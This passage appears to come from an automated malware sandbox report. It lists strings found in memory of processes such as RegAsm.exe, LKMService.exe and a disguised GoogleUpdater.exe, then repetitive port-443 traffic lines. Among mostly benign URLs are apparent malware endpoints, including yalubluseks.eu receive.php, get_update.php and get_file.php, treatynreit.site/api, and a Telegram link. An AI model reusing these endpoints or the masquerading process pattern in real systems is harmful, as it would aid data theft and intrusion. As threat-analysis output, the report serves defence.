                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://store.steampowered.com/news/
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://store.steampowered.com/points/shop/
                            Source: RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                            Source: RegAsm.exe, 00000014.00000002.3179432809.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://store.steampowered.com/stats/
                            Source: RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                            Source: RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                            Source: IEHJJECBKKECFIEBGCAKJKECGC.19.drString found in binary or memory: https://support.mozilla.org
                            Source: IEHJJECBKKECFIEBGCAKJKECGC.19.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                            Source: IEHJJECBKKECFIEBGCAKJKECGC.19.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
                            Source: E4aR4O9hOTF5WJfvKNpcVCp8.exe, 0000000F.00000002.2354142791.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/ae5ed
                            Source: RegAsm.exe, 00000027.00000002.2588002060.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3002399614.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://treatynreit.site/api
                            Source: RegAsm.exe, 00000013.00000002.2812494154.00000000279D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                            Source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.dr, nss3.dll.19.drString found in binary or memory: https://www.digicert.com/CPS0
                            Source: RegAsm.exe, 00000006.00000002.2328296570.0000000004037000.00000004.00000020.00020000.00000000.sdmp, userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, userJEHDHIEGII.exe.19.drString found in binary or memory: https://www.entrust.net/rpa0
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                            Source: RegAsm.exe, 0000002B.00000002.3002399614.000000000143C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3010663108.0000000001489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                            Source: CAAEBF.35.dr, IEHJJECBKKECFIEBGCAKJKECGC.19.drString found in binary or memory: https://www.mozilla.org
                            Source: IEHJJECBKKECFIEBGCAKJKECGC.19.drString found in binary or memory: https://www.mozilla.org#
                            Source: RegAsm.exe, 00000023.00000002.3031000104.000000001C44C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                            Source: IEHJJECBKKECFIEBGCAKJKECGC.19.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                            Source: RegAsm.exe, 00000023.00000002.3031000104.000000001C44C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                            Source: IEHJJECBKKECFIEBGCAKJKECGC.19.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                            Source: IEHJJECBKKECFIEBGCAKJKECGC.19.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                            Source: RegAsm.exe, 00000013.00000002.2812494154.00000000279D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                            Source: RegAsm.exe, 00000014.00000002.3179432809.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004DA000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3179432809.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3002399614.0000000001406000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.0000000000516000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                            Source: LKMService.exe, 00000002.00000002.4578665236.0000000003199000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000027B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu
                            Source: file.exe, 00000000.00000002.2124725712.0000000003035000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.0000000003199000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000003.00000002.4578530744.0000000002B7A000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000007.00000002.2292535537.00000000030D6000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2377496646.0000000003035000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000017.00000002.2457008561.00000000033CF000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000027B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu/
                            Source: GoogleUpdater.exe, 00000028.00000002.4580817011.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000028FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu/get_filT
                            Source: LKMService.exe, 00000002.00000002.4578665236.0000000003671000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.00000000035A8000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.000000000335F000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000028AA000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000028FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu/get_file.php
                            Source: LKMService.exe, 00000002.00000002.4578665236.00000000035A8000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.000000000335F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu/get_file.phpT
                            Source: LKMService.exe, 00000002.00000002.4578665236.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000028FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu/get_updatX
                            Source: LKMService.exe, 00000002.00000002.4578665236.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.0000000003199000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.000000000329C000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.0000000003631000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.000000000335F000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000028AA000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000028FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu/get_update.php
                            Source: LKMService.exe, 00000002.00000002.4578665236.0000000003631000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.000000000335F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu/get_update.phpT
                            Source: GoogleUpdater.exe, 00000028.00000002.4580817011.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000028FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu/receiP
                            Source: LKMService.exe, 00000002.00000002.4578665236.0000000003199000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.000000000329C000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.00000000035A8000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.000000000335F000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.0000000002863000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000028AA000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000027B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu/receive.php
                            Source: LKMService.exe, 00000002.00000002.4578665236.00000000035A8000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.000000000335F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu/receive.phpT
                            Source: LKMService.exe, 00000002.00000002.4578665236.0000000003199000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000027B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.eu/t
                            Source: LKMService.exe, 00000002.00000002.4578665236.0000000003323000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.0000000003671000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.000000000335F000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000028FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yalubluseks.euD
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58570 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58650 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58579
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58535 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58667 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58578
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58699
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58558 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58701 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58586
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58615 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58585
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58638 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58587
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58724 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58582
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58581
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58583
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58609 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58529 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58735 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58569 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58552 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58598 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58589
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58597
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58599
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58598
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58592
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58661 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58770 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58595
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58644 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58594
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58587 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58524 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58591
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58541 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58736 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58633 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58599 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58576 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58534 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58775 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58662 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58695 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58620 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58752 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58546 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58678 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58582 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58523 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58758 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58645 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58684 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58741 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58702 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58571 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58557 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58639 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58690 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58614 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58656 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58713 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58602 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58763 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58625 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58539
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58538
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58705 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58728 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58597 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58535
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58656
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58534
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58776
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58537
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58536
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58574 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58657
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58542
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58663
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58541
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58662
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58544
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58543
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58619 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58661
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58660
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58525 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58657 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58548 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58565 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58697 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58542 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58549
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58546
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58667
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58545
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58666
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58686 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58548
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58669
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58547
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58553
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58640 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58674
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58552
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58531 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58676
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58554
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58551
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58672
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58746 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58671
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58774 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58652 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58514 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58646 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58669 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58557
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58678
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58556
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58553 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58558
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58564
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58684
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58566
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58565
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58686
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58691 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58560
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58530 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58680
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58745 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58768 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58562
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58586 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58712 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58674 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58680 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58762 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58607 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58624 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58536 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58567
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58688
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58592 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58575 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58569
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58575
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58581 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58723 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58695
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58577
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58663 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58576
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58697
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58571
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58618 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58570
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58691
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58573
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58635 -> 443
